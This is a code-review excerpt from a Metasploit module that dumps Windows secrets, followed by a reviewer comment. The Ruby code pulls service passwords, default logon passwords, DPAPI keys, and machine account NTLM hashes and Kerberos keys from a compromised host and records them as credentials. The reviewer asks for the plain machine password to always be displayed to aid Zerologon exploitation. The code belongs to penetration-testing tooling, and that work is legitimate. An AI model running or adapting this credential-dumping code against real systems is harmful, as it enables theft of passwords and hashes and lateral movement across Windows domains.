modules/auxiliary/gather/windows_secrets_dump.rb

```diff
@@ -0,0 +1,1130 @@
+    end
+
+    if secret_item.start_with?("\x00\x00".b)
+      vprint_status("Discarding secret #{name}, all zeros")
+      return
+    end
+
+    upper_name = name.upcase
+    print_line("#{name}")
+
+    secret = ''
+    if upper_name.start_with?('_SC_')
+      # Service name, a password might be there
+      # We have to get the account the service runs under
+      account = get_service_account(name[4..-1])
+      if account
+        secret = "#{account.encode(Encoding::UTF_8)}:"
+      else
+        secret = '(Unknown User): '
+      end
+      secret << secret_item
+    elsif upper_name.start_with?('DEFAULTPASSWORD')
+      # We have to get the account this password is for
+      account = get_default_login_account || '(Unknown User)'
+      password = secret_item.dup.force_encoding(Encoding::UTF_16LE).encode(Encoding::UTF_8)
+      unless report_creds(account, password, type: :password)
+        vprint_bad("Error when reporting #{account} default password")
+      end
+      secret << "#{account}: #{password}"
+    elsif upper_name.start_with?('ASPNET_WP_PASSWORD')
+      secret = "ASPNET: #{secret_item}"
+    elsif upper_name.start_with?('DPAPI_SYSTEM')
+      # Decode the DPAPI Secrets
+      machine_key = secret_item[4,20]
+      user_key = secret_item[24,20]
+      report_info(machine_key.unpack('H*')[0], 'dpapi.machine_key')
+      report_info(user_key.unpack('H*')[0], 'dpapi.user_key')
+      secret = "dpapi_machinekey: 0x#{machine_key.unpack('H*')[0]}\ndpapi_userkey: 0x#{user_key.unpack('H*')[0]}"
+    elsif upper_name.start_with?('$MACHINE.ACC')
+      md4 = OpenSSL::Digest::MD4.digest(secret_item)
+      machine = simple.client.default_name
+      domain = simple.client.default_domain
+      print_name = "#{domain}\\#{machine}$"
+      ntlm_hash = "#{Net::NTLM::lm_hash('').unpack('H*')[0]}:#{md4.unpack('H*')[0]}"
+      secret_ary = ["#{print_name}:#{ntlm_hash}:::"]
+      credential_opts = {
+        realm_key:   Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
+        realm_value: domain
+      }
+      unless report_creds(print_name, ntlm_hash, credential_opts)
+        vprint_bad("Error when reporting #{print_name} NTLM hash")
+      end
+
+      extra_secret = get_machine_kerberos_keys(secret_item, print_name)
+      credential_opts[:type] = :password
+      if extra_secret.empty?
+        vprint_status('Could not calculate machine account Kerberos keys, printing plain password (hex encoded)')
+        raw_passwd = "#{print_name}:plain_password_hex:#{secret_item.unpack('H*')[0]}"
+        unless report_creds(print_name, raw_passwd, credential_opts)
+          vprint_bad("Error when reporting #{print_name} raw password hash")
+        end
+        extra_secret = [raw_passwd]
+      else
+        extra_secret.each do |sec|
+          unless report_creds(print_name, sec, credential_opts)
+            vprint_bad("Error when reporting #{print_name} machine kerberos key #{sec}")
+          end
+        end
+      end
```

Comment:
Would you be able to please adjust this block to promote the plain password value to always be displayed similar to the changes implemented [here](https://github.com/SecureAuthCorp/impacket/commit/78e8c8e41b3f163f1271a01ce3f2bf3bb880f687)? That would aid in exploiting Zerologon by allowing the password value to be recovered for restoration.